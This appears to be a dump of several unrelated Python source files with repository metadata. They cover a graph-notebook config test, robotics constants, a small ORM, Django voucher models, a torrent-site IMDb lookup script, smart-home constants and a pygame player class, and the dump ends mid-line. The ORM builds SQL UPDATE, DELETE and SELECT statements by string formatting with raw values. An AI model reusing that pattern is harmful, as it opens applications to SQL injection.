41406dd0b9bde817da5cd6498dd268425faf759a
4,553
py
Python
test/unit/configuration/test_configuration_from_main.py
Sam-Martin/graph-notebook
e7a8cefb93891ea19d6df4f17fe0acca3e223ae9
[ "ISC", "Apache-2.0", "CC0-1.0" ]
378
2020-11-02T23:44:37.000Z
2022-03-31T17:07:16.000Z
test/unit/configuration/test_configuration_from_main.py
Sam-Martin/graph-notebook
e7a8cefb93891ea19d6df4f17fe0acca3e223ae9
[ "ISC", "Apache-2.0", "CC0-1.0" ]
124
2020-11-07T14:35:28.000Z
2022-03-29T21:07:09.000Z
test/unit/configuration/test_configuration_from_main.py
Sam-Martin/graph-notebook
e7a8cefb93891ea19d6df4f17fe0acca3e223ae9
[ "ISC", "Apache-2.0", "CC0-1.0" ]
76
2020-11-04T03:52:08.000Z
2022-03-31T17:17:06.000Z
""" Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. SPDX-License-Identifier: Apache-2.0 """ import os import unittest from graph_notebook.configuration.generate_config import AuthModeEnum, Configuration from graph_notebook.configuration.get_config import get_config class TestGenerateConfigurationMain(unittest.TestCase): @classmethod def setUpClass(cls) -> None: cls.generic_host = 'blah' cls.neptune_host = 'instance.cluster.us-west-2.neptune.amazonaws.com' cls.port = 8182 cls.test_file_path = f'{os.path.abspath(os.path.curdir)}/test_generate_from_main.json' cls.python_cmd = os.environ.get('PYTHON_CMD', 'python3') # environment variable to let ToD hosts specify # where the python command is that is being used for testing. def tearDown(self) -> None: if os.path.exists(self.test_file_path): os.remove(self.test_file_path) def test_generate_configuration_main_defaults_neptune(self): expected_config = Configuration(self.neptune_host, self.port, auth_mode=AuthModeEnum.DEFAULT, load_from_s3_arn='', ssl=True) self.generate_config_from_main_and_test(expected_config, host_type='neptune') def test_generate_configuration_main_defaults_generic(self): expected_config = Configuration(self.generic_host, self.port, ssl=True) self.generate_config_from_main_and_test(expected_config) def test_generate_configuration_main_override_defaults_neptune(self): expected_config = Configuration(self.neptune_host, self.port, auth_mode=AuthModeEnum.IAM, load_from_s3_arn='loader_arn', ssl=False) self.generate_config_from_main_and_test(expected_config, host_type='neptune') def test_generate_configuration_main_override_defaults_generic(self): expected_config = Configuration(self.generic_host, self.port, ssl=False) self.generate_config_from_main_and_test(expected_config) def test_generate_configuration_main_empty_args_neptune(self): expected_config = Configuration(self.neptune_host, self.port) result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config ' f'--host "{expected_config.host}" --port "{expected_config.port}" --auth_mode "" --ssl "" ' f'--load_from_s3_arn "" --config_destination="{self.test_file_path}" ') self.assertEqual(0, result) config = get_config(self.test_file_path) self.assertEqual(expected_config.to_dict(), config.to_dict()) def test_generate_configuration_main_empty_args_generic(self): expected_config = Configuration(self.generic_host, self.port) result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config ' f'--host "{expected_config.host}" --port "{expected_config.port}" --ssl "" ' f'--config_destination="{self.test_file_path}" ') self.assertEqual(0, result) config = get_config(self.test_file_path) self.assertEqual(expected_config.to_dict(), config.to_dict()) def generate_config_from_main_and_test(self, source_config: Configuration, host_type=None): # This will run the main method that our install script runs on a Sagemaker notebook. # The return code should be 0, but more importantly, we need to assert that the # Configuration object we get from the resulting file is what we expect. if host_type == 'neptune': result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config ' f'--host "{source_config.host}" --port "{source_config.port}" ' f'--auth_mode "{source_config.auth_mode.value}" --ssl "{source_config.ssl}" ' f'--load_from_s3_arn "{source_config.load_from_s3_arn}" ' f'--config_destination="{self.test_file_path}" ') else: result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config ' f'--host "{source_config.host}" --port "{source_config.port}" ' f'--ssl "{source_config.ssl}" --config_destination="{self.test_file_path}" ') self.assertEqual(result, 0) config = get_config(self.test_file_path) self.assertEqual(source_config.to_dict(), config.to_dict())
56.9125
118
0.679113
566
4,553
5.157244
0.231449
0.076739
0.04111
0.049332
0.646454
0.632751
0.591984
0.55841
0.541966
0.526208
0
0.004783
0.219416
4,553
79
119
57.632911
0.816545
0.097079
0
0.322034
1
0
0.259819
0.184191
0
0
0
0
0.101695
1
0.152542
false
0
0.067797
0
0.237288
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
414211e54fff763958123b81d2506325421d7750
3,201
py
Python
robotpose/constants.py
OSU-AIMS/RoPE-S3D
0deed60b0c0b46324f9ce971bcf0b0b0af88ccf5
[ "Apache-2.0" ]
1
2021-05-17T17:35:01.000Z
2021-05-17T17:35:01.000Z
robotpose/constants.py
OSU-AIMS/RoPE-S3D
0deed60b0c0b46324f9ce971bcf0b0b0af88ccf5
[ "Apache-2.0" ]
1
2021-07-27T23:49:33.000Z
2021-07-29T19:53:14.000Z
robotpose/constants.py
OSU-AIMS/RoPE-S3D
0deed60b0c0b46324f9ce971bcf0b0b0af88ccf5
[ "Apache-2.0" ]
null
null
null
# Software License Agreement (Apache 2.0 License) # # Copyright (c) 2021, The Ohio State University # Center for Design and Manufacturing Excellence (CDME) # The Artificially Intelligent Manufacturing Systems Lab (AIMS) # All rights reserved. # # Author: Adam Exley import numpy as np import logging as log MAX_LINKS = 7 PATH_JSON_PATH = r'data/paths.json' JSON_LINK_FILE = r"\\marvin\ROPE\joint_states.json" ##################################### Crops CROP_RENDER_WEIGHTING = [6,3,3,0,1,0] # Higher numbers indicate more weight on that joint for rendering CROP_VARYING = 'SLUB' # Joints to vary for crop calculation CROP_MAX_PER_JOINT = 50 # Max poses for a single joint CROP_SEC_ALLOTTED_APPROX = 20 # Approx number of seconds allowed for each crop rendering stage calculation CROP_PADDING = 10 ##################################### Lookups GPU_MEMORY_ALLOWED_FOR_LOOKUP = 0.1 # Depending on hardware, this my vary. ~10% seems to work, but anything ~25%+ will overallocate for calculations LOOKUP_NAME_LENGTH = 5 LOOKUP_MAX_DIV_PER_LINK = 200 LOOKUP_JOINTS = 'SLU' # SL is also usable LOOKUP_NUM_RENDERED = 6 # 3 or 4 for SL ##################################### Segmentation Models MODELDATA_FILE_NAME = 'ModelData.json' NUM_MODELS_TO_KEEP = 3 # If a model has more than this number of stored checkpoints, they will be deleted. MODEL_NAME_LENGTH = 4 ##################################### Wizard Settings WIZARD_DATASET_PREVIEW = True # Set to false to reduce lag caused by dataset previewing ##################################### Verifier VERIFIER_ALPHA = .7 # Weight to place on images in verifier VERIFIER_SELECTED_GAMMA = -50 # Amount to add to R/G/B Channels of a selected image. Usually negative. VERIFIER_SCALER = 1.5 # Scale factor of thumbnails. Overall scale is this divided by THUMBNAIL_DS_FACTOR VERIFIER_ROWS = 4 # Rows of images present in Verifier VERIFIER_COLUMNS = 4 # Columns of images present in Verifier ##################################### Datasets VIDEO_FPS = 15 # Default video frames per second THUMBNAIL_DS_FACTOR = 6 # Factor to downscale images by for thumbnails. Larger numbers yield smaller images DEFAULT_CAMERA_POSE = [0, -1.5, .75, 0, 0, 0] # Base camera pose to fill new datasets with before alignment ##################################### Rendering def default_render_color_maker(num:int): """Creates unique colors for rendering. Parameters ---------- num : int Number of colors to generate. Should be larger than the number of meshes expected to use. For 6-axis robots, the minimum recommended number is 7. Returns ------- List[List] num pairs of RGB triplets """ if num < 7: log.warn('Fewer than 7 rendering colors are being generated. This may cause issues if a URDF with a 6+ axis robot is loaded.') b = np.linspace(0,255,num).astype(int) # Blue values are always unique g = [0] * b.size r = np.abs(255 - 2*b) colors = [] for idx in range(num): colors.append([b[idx],g[idx],r[idx]]) return colors DEFAULT_RENDER_COLORS = default_render_color_maker(7) # Increase if expecting to use more meshes/end effector
34.793478
148
0.672602
460
3,201
4.552174
0.519565
0.015282
0.017192
0.016237
0.023878
0
0
0
0
0
0
0.025573
0.181506
3,201
92
149
34.793478
0.773664
0.504842
0
0
0
0.026316
0.144338
0.024721
0
0
0
0
0
1
0.026316
false
0
0.052632
0
0.105263
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41427dc7083acbd1f30a5967de148b9aeabaff30
5,619
py
Python
Pybernate/Entity.py
lmnoel/pybernate
807750f5d3a5c356d6516ddd81edaa2210269807
[ "MIT" ]
null
null
null
Pybernate/Entity.py
lmnoel/pybernate
807750f5d3a5c356d6516ddd81edaa2210269807
[ "MIT" ]
null
null
null
Pybernate/Entity.py
lmnoel/pybernate
807750f5d3a5c356d6516ddd81edaa2210269807
[ "MIT" ]
null
null
null
from Pybernate.Exceptions import LazyInitializationException class Entity: def __init__(self): self.deleted = False self.dirty = False self.initialized = False def set_dirty(self, state): self.dirty = state def get_dirty(self): return self.dirty def set_deleted(self, state): self.deleted = state def get_deleted(self): return self.deleted def set_initialized(self, state): self.initialized = state def get_initialized(self): return self.initialized def rollback(self): pass class IdEntity(Entity): def __init__(self, **kwargs): super().__init__() self.id = None self.table = self.get_subclass_name().lower() self.lazies = set() self.transients = set() self.elements = {} self._mixin(kwargs) self.id_column = "id" self.column_names = list(kwargs.keys()) self.one_to_many = {} self.many_to_one = {} self.override_methods() def _mixin(self, data): if isinstance(data, dict): self.lazies -= data.keys() self.elements = {**self.elements, **data} elif isinstance(data, IdEntity): self.elements[data.table] = data def set_table(self, table_name): self.table = table_name def set_id_column(self, col_name): self.id_column = col_name def add_lazy(self, fxn): self.lazies.add(fxn[4:]) def add_transient(self, fxn): self.transients.add(fxn) def addOneToMany(self, other_table, join_column): self.one_to_many[other_table[4:]] = join_column def addManyToOne(self, other_table, join_column): self.many_to_one[other_table[4:]] = join_column def get_id(self): return self.id def set_id(self, id): self.id = id def init_lazy(self, data): self.id = data[self.id_column] del data[self.id_column] self.elements = data self.column_names = data.keys() def get_element_methods(self): return sorted(list(self.get_subclass_methods() - self.transients)) # deterministic for testing def override_methods(self): methods = self.get_element_methods() for method in methods: if method.startswith("get_"): method_target = method[4:] getattr(self, method)() if method_target in self.lazies and method_target in self.elements: self.lazies.remove(method_target) if self.id_column == method_target: setattr(self, method, lambda: self.get_id()) continue if method in self.transients: continue setattr(self, method, lambda t=method_target: self.get_element(t)) if method_target not in self.elements: self.set_element(method_target, None) elif method.startswith("set_"): method_target = method[4:] getattr(self, method)(None) if method in self.transients: continue setattr(self, method, lambda value, x=method_target: self.set_element(x, value)) def get_element(self, x): if x in self.lazies: raise LazyInitializationException(x) return self.elements[x] def set_element(self, x, value): self.elements[x] = value self.set_dirty(True) def get_insert_query(self): names_component = ", ".join(["`" + a + "`" for a in self.column_names]) elements_component = ", ".join(["%s "] * len(self.column_names)) return "INSERT INTO {} ({}) VALUES ({})".format(self.table, names_component, elements_component) def get_update_query(self): updates = ", ".join(["{} = '{}'".format(key, value) for key, value in self.elements.items()]) return "UPDATE {} SET {} WHERE id = {}".format(self.table, updates, self.id) def get_initialize_query(self, attribute): return "SELECT {} FROM {} WHERE {} = {}".format(attribute, self.table, self.id_column, self.id) def get_delete_query(self): return "DELETE FROM {} WHERE {} = {}".format(self.table, self.id_column, self.id) def get_select_all_query(self): return "SELECT * FROM {} WHERE {} = {}".format(self.table, self.id_column, self.id) def get_eager_fields(self): return self.elements.keys() - self.lazies - self.transients - self.one_to_many.keys() - self.many_to_one.keys() def get_many_to_one_relationships(self): return self.many_to_one def get_one_to_many_relationships(self): return self.one_to_many def get_select_lazy_query(self): fields = self.get_eager_fields() fields.add(self.id_column) eager_fields = ", ".join(fields) return "SELECT {} FROM {} WHERE {} = {}".format(eager_fields, self.table, self.id_column, self.id) def get_raw_elements(self): return [self.elements[k] for k in self.column_names] def get_subclass_name(self): return self.__class__.__name__ def get_subclass_methods(self): return {func for func in dir(self.__class__) if callable(getattr(self.__class__, func))} \ - {func for func in dir(IdEntity) if callable(getattr(IdEntity, func))}
34.685185
119
0.588005
672
5,619
4.6875
0.157738
0.038095
0.038095
0.025397
0.173333
0.142222
0.109206
0.086349
0.086349
0.065397
0
0.001275
0.302189
5,619
162
120
34.685185
0.802091
0.004449
0
0.055118
0
0
0.038083
0
0
0
0
0
0
1
0.275591
false
0.007874
0.007874
0.110236
0.440945
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
2
4143ccf190301cf56eeae0f7c02717bcd229a66f
213
py
Python
molsysmt/native/old/former_topology/elements/groups/__init__.py
dprada/molsysmt
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
[ "MIT" ]
3
2020-06-02T03:55:52.000Z
2022-03-21T04:43:52.000Z
molsysmt/native/old/former_topology/elements/groups/__init__.py
dprada/molsysmt
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
[ "MIT" ]
28
2020-06-24T00:55:53.000Z
2021-07-16T22:09:19.000Z
molsysmt/native/old/former_topology/elements/groups/__init__.py
dprada/molsysmt
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
[ "MIT" ]
1
2021-06-17T18:55:25.000Z
2021-06-17T18:55:25.000Z
from .group import Group from .aminoacid import AminoAcid from .nucleotide import Nucleotide from .water import Water from .ion import Ion from .cosolute import Cosolute from .small_molecule import SmallMolecule
23.666667
41
0.830986
29
213
6.068966
0.37931
0
0
0
0
0
0
0
0
0
0
0
0.13615
213
8
42
26.625
0.956522
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
5
41444b1ef7879f2253a4932d8f0e3e78f39e2fa9
101
py
Python
DCAL_utils_special/plotter_utils_consts.py
gamedaygeorge/datacube-applications-library
1b6314ee3465f9f17930391a4c241e981a9e200e
[ "Apache-2.0" ]
null
null
null
DCAL_utils_special/plotter_utils_consts.py
gamedaygeorge/datacube-applications-library
1b6314ee3465f9f17930391a4c241e981a9e200e
[ "Apache-2.0" ]
null
null
null
DCAL_utils_special/plotter_utils_consts.py
gamedaygeorge/datacube-applications-library
1b6314ee3465f9f17930391a4c241e981a9e200e
[ "Apache-2.0" ]
1
2021-02-25T14:19:05.000Z
2021-02-25T14:19:05.000Z
# The number of points to use in smooth curve fits. n_pts_smooth = 2000 default_fourier_n_harm = 10
33.666667
52
0.782178
19
101
3.894737
0.894737
0
0
0
0
0
0
0
0
0
0
0.072289
0.178218
101
3
53
33.666667
0.819277
0.485149
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
4144ac6c76ba124c7f21052971d1bc054211eeab
447
py
Python
reads/migrations/0008_auto_20171119_0744.py
mguarascio/runnerreads-com
3bc877cf24370cf881a98a1c5915693464bc69e8
[ "MIT" ]
null
null
null
reads/migrations/0008_auto_20171119_0744.py
mguarascio/runnerreads-com
3bc877cf24370cf881a98a1c5915693464bc69e8
[ "MIT" ]
null
null
null
reads/migrations/0008_auto_20171119_0744.py
mguarascio/runnerreads-com
3bc877cf24370cf881a98a1c5915693464bc69e8
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # Generated by Django 1.11.7 on 2017-11-19 12:44 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('reads', '0007_auto_20171115_2224'), ] operations = [ migrations.AlterField( model_name='book', name='link', field=models.CharField(max_length=2000), ), ]
21.285714
52
0.612975
50
447
5.28
0.82
0
0
0
0
0
0
0
0
0
0
0.11315
0.268456
447
20
53
22.35
0.69419
0.152125
0
0
1
0
0.095745
0.06117
0
0
0
0
0
1
0
false
0
0.153846
0
0.384615
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
4146262f3d74196d4ad2779199fd0a16f247abbd
930
py
Python
full_metal/models.py
nightwarriorftw/alchemist
38634da50370edc07c1bae09ff05a66e92f2f8c0
[ "MIT" ]
null
null
null
full_metal/models.py
nightwarriorftw/alchemist
38634da50370edc07c1bae09ff05a66e92f2f8c0
[ "MIT" ]
null
null
null
full_metal/models.py
nightwarriorftw/alchemist
38634da50370edc07c1bae09ff05a66e92f2f8c0
[ "MIT" ]
null
null
null
from django.db import models from django.db.models.fields import related class MarketingCampaign(models.Model): """Store the information of marketing campaign.""" title = models.CharField(max_length=50) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) def __str__(self) -> str: return f'<Marketing Campaign: {self.title}>' class Voucher(models.Model): """Store the information of the voucher.""" campaign = models.ForeignKey(MarketingCampaign, on_delete=models.CASCADE, related_name="campaign") code = models.CharField(max_length=15) active = models.BooleanField(default=False) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) def __str__(self) -> str: active = "Yes" if self.active else "No" return f"<Voucher: {self.code} ({active})>"
34.444444
102
0.711828
117
930
5.470085
0.42735
0.05
0.13125
0.15625
0.39375
0.39375
0.29375
0.29375
0.29375
0.29375
0
0.005195
0.172043
930
27
103
34.444444
0.825974
0.088172
0
0.352941
0
0
0.095465
0
0
0
0
0
0
1
0.117647
false
0
0.117647
0.058824
0.941176
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
4146c32ffd539838b9529d72258302c84167df28
1,216
py
Python
pantofola_search/tools/kickass_fetcher.py
phingage/pantofola.io
f41036d2e568a45f328e2a7ca81d76a27cd134dc
[ "WTFPL" ]
1
2018-06-09T22:20:00.000Z
2018-06-09T22:20:00.000Z
pantofola_search/tools/kickass_fetcher.py
phingage/pantofola.io
f41036d2e568a45f328e2a7ca81d76a27cd134dc
[ "WTFPL" ]
4
2020-02-11T22:01:16.000Z
2021-06-10T17:38:56.000Z
pantofola_search/tools/kickass_fetcher.py
phingage/pantofola.io
f41036d2e568a45f328e2a7ca81d76a27cd134dc
[ "WTFPL" ]
null
null
null
__author__ = 'armanini' import httplib, requests, re from urlparse import urlparse class KickAssFetcher(object): def __init__(self): self.search_url = "http://kickass.to/usearch/" self.title_re = re.compile(r'(?P<imdb_id>tt\d{7})', flags=re.IGNORECASE + re.MULTILINE) def search(self, torrent_hash): url = self.search_url + torrent_hash print "Start search for: ", url r = requests.get(url) if len(r.history) < 0 or r.history[-1].status_code != 302: print "No History ", r.history return None res = self.title_re.findall(r.text) print res if res: print "Found: ", res[-1] return res[-1] else: print "Imdb Not found!" return None def get_status_code(self, url): url_part = urlparse(url) try: conn = httplib.HTTPConnection(url_part.netloc) conn.request("HEAD", url_part.path) return conn.getresponse().status except: return None def main(): kParse = KickAssFetcher() kParse.search("252DDC4D3EF6E7EE393CD842239ACEB86BF7A546") if __name__ == "__main__": main()
25.87234
95
0.589638
145
1,216
4.744828
0.482759
0.034884
0.037791
0
0
0
0
0
0
0
0
0.03517
0.29852
1,216
47
96
25.87234
0.771395
0
0
0.085714
0
0
0.129006
0.032868
0
0
0
0
0
0
null
null
0
0.057143
null
null
0.142857
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
4148771c5460032b6e6cf71a733f1a7a81a72d62
2,893
py
Python
custom_components/localtuya/const.py
JonathanFerraz/home-assistant
15cd52f5eff850f978949406071fbe98b882918a
[ "MIT" ]
18
2016-08-10T01:02:27.000Z
2017-10-26T04:19:49.000Z
custom_components/localtuya/const.py
JonathanFerraz/home-assistant
15cd52f5eff850f978949406071fbe98b882918a
[ "MIT" ]
null
null
null
custom_components/localtuya/const.py
JonathanFerraz/home-assistant
15cd52f5eff850f978949406071fbe98b882918a
[ "MIT" ]
4
2017-04-20T19:41:21.000Z
2017-05-16T17:10:05.000Z
"""Constants for localtuya integration.""" ATTR_CURRENT = "current" ATTR_CURRENT_CONSUMPTION = "current_consumption" ATTR_VOLTAGE = "voltage" CONF_LOCAL_KEY = "local_key" CONF_PROTOCOL_VERSION = "protocol_version" CONF_DPS_STRINGS = "dps_strings" CONF_PRODUCT_KEY = "product_key" # light CONF_BRIGHTNESS_LOWER = "brightness_lower" CONF_BRIGHTNESS_UPPER = "brightness_upper" CONF_COLOR = "color" CONF_COLOR_MODE = "color_mode" CONF_COLOR_TEMP_MIN_KELVIN = "color_temp_min_kelvin" CONF_COLOR_TEMP_MAX_KELVIN = "color_temp_max_kelvin" CONF_COLOR_TEMP_REVERSE = "color_temp_reverse" CONF_MUSIC_MODE = "music_mode" # switch CONF_CURRENT = "current" CONF_CURRENT_CONSUMPTION = "current_consumption" CONF_VOLTAGE = "voltage" # cover CONF_COMMANDS_SET = "commands_set" CONF_POSITIONING_MODE = "positioning_mode" CONF_CURRENT_POSITION_DP = "current_position_dp" CONF_SET_POSITION_DP = "set_position_dp" CONF_POSITION_INVERTED = "position_inverted" CONF_SPAN_TIME = "span_time" # fan CONF_FAN_SPEED_CONTROL = "fan_speed_control" CONF_FAN_OSCILLATING_CONTROL = "fan_oscillating_control" CONF_FAN_SPEED_MIN = "fan_speed_min" CONF_FAN_SPEED_MAX = "fan_speed_max" CONF_FAN_ORDERED_LIST = "fan_speed_ordered_list" CONF_FAN_DIRECTION = "fan_direction" CONF_FAN_DIRECTION_FWD = "fan_direction_forward" CONF_FAN_DIRECTION_REV = "fan_direction_reverse" # sensor CONF_SCALING = "scaling" # climate CONF_TARGET_TEMPERATURE_DP = "target_temperature_dp" CONF_CURRENT_TEMPERATURE_DP = "current_temperature_dp" CONF_TEMPERATURE_STEP = "temperature_step" CONF_MAX_TEMP_DP = "max_temperature_dp" CONF_MIN_TEMP_DP = "min_temperature_dp" CONF_PRECISION = "precision" CONF_TARGET_PRECISION = "target_precision" CONF_HVAC_MODE_DP = "hvac_mode_dp" CONF_HVAC_MODE_SET = "hvac_mode_set" CONF_PRESET_DP = "preset_dp" CONF_PRESET_SET = "preset_set" CONF_HEURISTIC_ACTION = "heuristic_action" CONF_HVAC_ACTION_DP = "hvac_action_dp" CONF_HVAC_ACTION_SET = "hvac_action_set" CONF_ECO_DP = "eco_dp" CONF_ECO_VALUE = "eco_value" # vacuum CONF_POWERGO_DP = "powergo_dp" CONF_IDLE_STATUS_VALUE = "idle_status_value" CONF_RETURNING_STATUS_VALUE = "returning_status_value" CONF_DOCKED_STATUS_VALUE = "docked_status_value" CONF_BATTERY_DP = "battery_dp" CONF_MODE_DP = "mode_dp" CONF_MODES = "modes" CONF_FAN_SPEED_DP = "fan_speed_dp" CONF_FAN_SPEEDS = "fan_speeds" CONF_CLEAN_TIME_DP = "clean_time_dp" CONF_CLEAN_AREA_DP = "clean_area_dp" CONF_CLEAN_RECORD_DP = "clean_record_dp" CONF_LOCATE_DP = "locate_dp" CONF_FAULT_DP = "fault_dp" CONF_PAUSED_STATE = "paused_state" CONF_RETURN_MODE = "return_mode" CONF_STOP_STATUS = "stop_status" DATA_DISCOVERY = "discovery" DOMAIN = "localtuya" # Platforms in this list must support config flows PLATFORMS = [ "binary_sensor", "climate", "cover", "fan", "light", "number", "select", "sensor", "switch", "vacuum", ] TUYA_DEVICE = "tuya_device"
27.817308
56
0.807812
413
2,893
5.065375
0.227603
0.054493
0.022945
0.034417
0
0
0
0
0
0
0
0
0.104044
2,893
103
57
28.087379
0.807099
0.045282
0
0
0
0
0.359403
0.070571
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
414999092001be652ff829a08dad85777592db23
8,098
py
Python
source/player.py
2nPlusOne/pygame-platformer
69078819280506d8ab1af4c493da22eb02b4fe01
[ "MIT" ]
null
null
null
source/player.py
2nPlusOne/pygame-platformer
69078819280506d8ab1af4c493da22eb02b4fe01
[ "MIT" ]
null
null
null
source/player.py
2nPlusOne/pygame-platformer
69078819280506d8ab1af4c493da22eb02b4fe01
[ "MIT" ]
null
null
null
import pygame from settings import * import utils class Player(pygame.sprite.Sprite): def __init__(self, pos, groups, collision_sprites): super().__init__(groups) self.image = pygame.Surface((TILE_SIZE / 2, TILE_SIZE)) self.image.fill(PLAYER_COLOR) self.rect = self.image.get_rect(topleft=pos) self.collision_sprites = collision_sprites # Player movement self.direction_x = 0 # -1 = left, 1 = right, 0 = none self.velocity = pygame.math.Vector2() self.speed = MAX_PLAYER_SPEED # Jumping self.jumps_remaining = MAX_JUMPS self.is_grounded = False # Is the player on the ground? self.was_grounded = False # Used to determine if the player has left the ground this frame self.is_jumping = False # Is the player jumping? self.jump_pressed = False # Is the jump key currently pressed? self.jumping_locked = False # Used to lock the player from jumping again until they release the jump key self.current_gravity = 0 # The current gravity affecting the player self.jump_gravity = (2 * MAX_JUMP_HEIGHT) / (TIME_TO_JUMP_APEX ** 2) self.fall_gravity = self.jump_gravity * FALL_GRAVITY_MULTIPLIER self.jump_velocity = ((-2 * MAX_JUMP_HEIGHT) / TIME_TO_JUMP_APEX) - self.fall_gravity # Time self.coyote_timer = COYOTE_TIME # Time the player has to jump after leaving the ground self.jump_buffer_timer = JUMP_BUFFER_TIME # Registers jump input as long as this is less than JUMP_BUFFER_TIME self.last_frame_ticks = 0 # Not used if using estimated delta_time (1/FPS) def process_input(self, events): """Process input events. This method is called by Level, which passes in the events from the main game loop.""" for event in events: if event.type == pygame.KEYDOWN: if event.key == pygame.K_LEFT: # Move left self.direction_x = -1 if event.key == pygame.K_RIGHT: # Move right self.direction_x = 1 if event.key == pygame.K_UP: # Jump self.jump_pressed = True if event.key == pygame.K_g: # Invert gravity just for fun self.fall_gravity = -self.fall_gravity self.current_gravity = -self.current_gravity if event.type == pygame.KEYUP: if event.key == pygame.K_LEFT and self.direction_x < 0: self.direction_x = 0 if event.key == pygame.K_RIGHT and self.direction_x > 0: self.direction_x = 0 if event.key == pygame.K_UP: self.jump_pressed = False self.jumping_locked = False def check_jump_buffer(self): """Conditionally applies jumping force to the player.""" self.update_jump_buffer_timer() # jump_allowed = not (self.jumps_remaining > 0 and # (self.is_grounded or self.is_jumping or # self.coyote_timer < COYOTE_TIME)) jump_input = self.jump_buffer_timer < JUMP_BUFFER_TIME can_jump = not self.jumping_locked and self.jumps_remaining > 0 and ( self.is_jumping or self.coyote_timer < COYOTE_TIME) self.jumping_locked = self.jump_pressed if jump_input and can_jump: self.jump() def jump(self): self.coyote_timer = COYOTE_TIME self.jump_buffer_timer = JUMP_BUFFER_TIME self.is_jumping = True self.jumps_remaining -= 1 self.current_gravity = self.jump_gravity self.velocity.y = self.jump_velocity def update_air_timer(self): """Resets air timer if grounded, otherwise increments by delta time.""" self.coyote_timer = 0 if self.is_grounded else round(self.coyote_timer + EST_DELTA_TIME, 2) def update_jump_buffer_timer(self): """Resets jump buffer timer if jump key pressed, otherwise increments by delta time.""" self.jump_buffer_timer = 0 if self.jump_pressed and not self.jumping_locked else round(self.jump_buffer_timer + EST_DELTA_TIME, 2) def move(self): """Move the player and apply collisions.""" self.velocity.y += self.current_gravity self.check_jump_buffer() # Check if the player should jump this frame target_velocity = pygame.math.Vector2(self.direction_x * self.speed, self.velocity.y) self.velocity = utils.pygame_vector2_smooth_damp(self.velocity, target_velocity, SMOOTH_TIME, EST_DELTA_TIME) self.velocity.x = 0 if abs(self.velocity.x) < 2*SMOOTH_TIME else self.velocity.x # Horizontal movement and collisions self.rect.x += self.velocity.x for sprite in self.collision_sprites.sprites(): if not sprite.rect.colliderect(self.rect): continue # Right collision elif abs(self.rect.right - sprite.rect.left) < COLLISION_TOLERANCE and self.velocity.x > 0: self.rect.right = sprite.rect.left # Left collision elif abs(self.rect.left - sprite.rect.right) < COLLISION_TOLERANCE and self.velocity.x < 0: self.rect.left = sprite.rect.right self.velocity.x = 0 break # Vertical movement and collisions # Since vertical movement can be potentially a lot faster than horizontal due to gravity, # we need to check for collisions as we go each frame, instead of after moving by the velocity. for i in range(abs(int(self.velocity.y))): collided = False self.rect.y += abs(self.velocity.y) / self.velocity.y for sprite in self.collision_sprites.sprites(): if not sprite.rect.colliderect(self.rect): continue # Bottom collision elif abs(self.rect.bottom - sprite.rect.top) < COLLISION_TOLERANCE and self.velocity.y > 0: self.rect.bottom = sprite.rect.top # Top collision elif abs(self.rect.top - sprite.rect.bottom) < COLLISION_TOLERANCE and self.velocity.y < 0: self.rect.top = sprite.rect.bottom self.velocity.y = 0 collided = True break if collided: break # Set gravity to fall gravity scale if we're falling or not holding jump if (not self.is_grounded and (not self.jump_pressed or self.velocity.y > 0)): self.current_gravity = self.fall_gravity def set_grounded(self): """Moves the player down 1 pixel and checks for a collision.""" self.rect.y += 1 for sprite in self.collision_sprites.sprites(): if sprite.rect.colliderect(self.rect): if not abs(self.rect.bottom - sprite.rect.top) < COLLISION_TOLERANCE: continue self.is_grounded = True self.was_grounded = True self.is_jumping = False self.jumps_remaining = MAX_JUMPS break else: self.is_grounded = False left_ground_this_frame = self.was_grounded and not self.is_grounded if not left_ground_this_frame: continue self.air_time_start = pygame.time.get_ticks() self.was_grounded = False self.rect.y -= 1 def update(self): """Update the player.""" self.update_air_timer() self.move() self.set_grounded() print(f"jumps_remaining: {self.jumps_remaining}") print(f"jump_locked: {self.jumping_locked}") # Zombie method, only used if I decide I need perfect delta time (should probably remove this...) def update_delta_time(self): """Update the delta time.""" self.delta_time = (pygame.time.get_ticks() - self.last_frame_ticks) / 1000 self.last_frame_ticks = 